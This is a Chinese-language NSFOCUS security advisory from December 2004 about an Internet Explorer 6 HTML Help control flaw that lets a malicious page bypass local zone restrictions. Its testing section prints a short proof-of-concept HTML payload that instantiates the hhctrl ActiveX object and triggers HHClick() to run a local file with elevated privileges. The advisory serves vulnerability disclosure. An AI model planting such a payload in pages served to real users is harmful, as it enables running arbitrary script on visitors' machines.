首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第55期->最新漏洞
日期:2005-01-06
发布日期:2004-12-18
更新日期:2004-12-21
受影响系统:
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000
描述:
--------------------------------------------------------------------------------
Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer帮助控件存在问题,远程攻击者可以利用这个漏洞绕过本地安全域限制。
利用MSIE帮助控件,建立恶意页面,诱使用户访问,可以导致绕过本地安全域检查,以高权限执行任意脚本内容。
<*来源:Paul (paul@greyhats.cjb.net)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110356607505041&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Paul (paul@greyhats.cjb.net)提供了如下测试代码:
<OBJECT id="hhctrl" type="application/x-oleobject" \
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3 \
790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;"> \
<PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" \
value="Text:Just a button"> <PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;C:\WINDOWS\PCHealth\malwarez[1].htm">
</OBJECT>
<script>
hhctrl.HHClick();
</script>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
版权所有,未经许可,不得转载